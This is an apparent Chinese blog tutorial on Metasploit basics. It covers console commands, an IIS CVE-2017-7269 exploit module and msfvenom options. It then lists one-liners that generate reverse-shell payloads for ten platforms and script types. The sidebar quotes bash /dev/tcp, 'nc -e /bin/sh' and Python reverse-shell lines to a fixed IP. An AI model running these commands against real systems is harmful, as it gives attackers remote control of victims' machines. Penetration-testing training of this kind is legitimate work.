msf 生成php马_msf系列篇章之msf的基础模块和命令

最新推荐文章于 2024-03-19 10:57:22 发布
最新推荐文章于 2024-03-19 10:57:22 发布
阅读量822 收藏 4
点赞数
文章标签: msf 生成php马

1、 msf的基础介绍

kali是默认集成了mepasploit framework,简称为msf,不同的框架下,它有不同的模块,不同的模块之间,互相交流彼此生产输入输出的数据,第一个模块生成的数据可以给第二个或者第三个模块去直接拿来使用,原因是它拿来使用的是后台有数据库,其它的版本后面也有数据库,比如说我们扫描的目标系统,扫描下来的信息,比如说开放了哪些端口,哪些信息,都会存到数据库里面,而measploit framework用的是postgresql数据库来进行存储。

早期的msf版本需要先启动数据库再启动msf

2)msf的基本机构

24a86fe37a237e238ddaff50296d0bc1.png

3)、msf的基础操作和命令

在这里的话,我们打开kali的终端,输入msfconsole打开msf的界面,因为kali系统是自带的msf工具,执行命令之后,它这里会进行一个初始化,接着就可以看见msf的命令行界面

d54cab4f19aab22f1a1bfab1ab6a6a4e.png

4)msf中专业术语,因为在msf中,这些都是常见的专业术语,也是必要的

– Exploit,攻击工具/代码

– Payload,攻击载荷

– Shellcode

– Module,模块

– Listener,监听器

5)、常用命令

showpayloads (show 可以理解为显示的意思), 查看所有可用的渗透攻击程序代码

f5eba137466dffd13e6e3e1c87f91802.png

show auxiliary – 查看所有可用的辅助攻击工具,然后就可以看见显示出相对应的辅助工具

8c7b54f1a454607b237839d36ecaa1f2.png

Use exploist/windows/iis/cve_2017_7269 进入相对应的模块,比如说我进入了cve_2017_7269漏洞模块,接着就可以看见它这里进入了

139bb8290bb0888d2670ab4426cb6cec.png

show options – 查看该模块所有可用选项,比如说我们进入cve_2017_7269漏洞模块,执行攻击的话,需要配置该模块的一些选项

3bddeeb5a83cc8c54dc551c3e57addd7.png

show payloads – 查看该模块适用的所有载荷代码,然后就可以显示出相对应的payload

62cf31d324af67a86ee6948553a71499.png

show targets – 查看该模块适用的攻击目标类型

search ssh - 根据关键字搜索某模块,比如说我搜索ssh相对应的漏洞模块,就可以看见显示出相对应的ssh关键词的模块

b80a5a412b2373bfbcfa0601fb2cb4db.png

info – 显示某模块的详细信息

81493f8582b5683689a237f1aa3cab4a.png

bach –退出当前进行的模块

0b42a68d5f1ed6fdf9df63b6cac7cebc.png

6)msfvenom (攻击载荷生成和编码器)

主要参数:

-p payload

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

LHOST,LPORT 监听上线的主机IP和端口

-f exe 生成EXE格式

使用msfvenom -l 可以查看可以利用payload

msfvenom -l | grep windows | grep x64 | grep tcp 选择payload

7)、在Linux命令下,执行msf命令生成可执行的文件,这些文件用来反弹shell用于提权,各种可执行的脚本命令如下。

Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac:

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '' > shell.php && pbpaste >> shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR:

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

Python:

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash:

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl:

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

最后喜欢我文章的朋友请加圈子关注我们,私信关键词:学习。(送免费资料和优惠券)

就会自动分享给你微信号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。

还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券

weixin_39583013
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php-msf源码详解
01-21
我们来看分享下具体源码:php-msf: https://github.com/pinguo/php-msf 源码解读也做了一段时间了, 总结一下自己的心得: 抓住 生命周期, 让代码在你脑海中 跑起来 分析架构, 关键字 分层 边界 隔离 一个好的框架, 弄清楚 生命周期 和 架构, 基本就已经到了 熟悉 的状态了, 之后是填充细节和编码熟练了 这里再介绍几个次重要的心得: 弄明白这个工具擅长干什么, 适合干什么. 这个信息也非常容易获取到, 工具的文档通常都会显眼标注出来, 可以通过这些 功能/特性, 尝试以点见面 从工程化的角度去看这个项目, 主要和上面的 架构 区分, 在处理核心
msf渗透练习-php后门反弹
weixin_49349476的博客
06-09 2296
php后门反弹,就是通过php的后门文件,对目标进行操控。本次使用msf完成(仅供学习)
利用MSF生成php,windows,Linux三类木
2301_76786857的博客
03-19 1102
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
msf5 自动攻击模块 db_autopwn
07-10
msf5 自动攻击模块 db_autopwn msf5 自动攻击模块 db_autopwn
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
用Matlab实现基于均值平移(meanshift)算法的灰度图像平滑。有迭代过程,效果比较不错。
MSF_PHP后门反弹连接_DVWA文件上传木_Metasploit配置监控及msfvenom生成攻击载荷
qq_51550750的博客
06-02 880
msf——PHP后门反弹连接
msf 生成php_场景图生成任务(Scene graph generation)入坑
weixin_39638105的博客
11-02 455
1 - 问题 & 任务图片场景图生成任务(Image scene graph generation)目标是让计算机自动生成一种语义化的图结构(称为 scene graph,场景图),作为图像的表示。图像中的目标对应 graph node,目标间的关系对应 graph edge(目标的各种属性,如颜色,有时会在图中表示)。这种结构化表示方法相对于向量表示更加直观,可以看做是小型知识图谱,因此...
msf生成php反弹,反弹shell总结
weixin_29967445的博客
04-13 1383
1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&12.nc反弹nc -e /bin/sh 192.168.2.130 44443.pythonimport socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "1...
php-msf 负载均衡,Metasploit常用操作命令
weixin_30227565的博客
03-26 180
0x00 简述0x01基本操作1.启动MSF这里用的是kali里面的msf,需要开启msf依赖的数据库为PostgreSQL:service postgresql start# 启动 postgresql数据库msfconsole# 启动msf这样就算是启动成功了,左下角会变成msf >。2.配置和生成在kali下用ifconfig查询当前攻击机的ip,用于生成和配置监听。ifcon...
msf生成php,使用msfpayload生成后门(asp,aspx,php,jsp,exe)等
weixin_39752941的博客
03-10 740
msfpayload与msfencode参数说明执行msfpayload -h查看都有哪些参数执行msfencode -h查看都有哪些参数生成backdoor类型可以生成asp、aspx、php、jsp、war、exe等多种类型,下面介绍的使用方法就不一一测试了.msfpayload生成linux backdoor目标机器运行linux2,本机监听下端口,使用metasploit或者nc都行,测试...
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
[ MSF ] Meterpreter扩展模块命令详解
Generic_Player_3.4.4.1_20080911.rar_CMMB MSF_Generic_Play_cmmb p
09-24
创毅视讯的CMMB Dongle 播放软件,可播放CMMB MFS、MSF格式的流,内附杭州CMMB的码流
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。...MSF指导由原理、模型和用来管理人员、项目和技术元素的准则
基于matlab实现实现了基于项目的协同过滤代码,MATLAB实现.rar
05-04
基于matlab实现实现了基于项目的协同过滤代码,MATLAB实现.rar
各地区年末城镇登记失业人员及失业率.xls
最新发布
05-05
数据来源:中国劳动统计NJ-2023版
企业固定资产信息管理系统设计与实现.doc
05-04
企业固定资产信息管理系统设计与实现.doc
node-v11.14.0-darwin-x64.tar.xz
05-04
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
node-v8.9.1-sunos-x64.tar.xz
05-04
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
msf生成linux木
03-16
MSF是Metasploit Framework的缩写,是一款常用的渗透测试工具。要生成Linux木,可以使用MSF中的payload生成器来创建一个适合Linux系统的payload,然后使用MSF中的exploit模块来利用漏洞,将payload注入到目标系统中,从而实现远程控制。具体操作可以参考MSF的官方文档或相关教程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值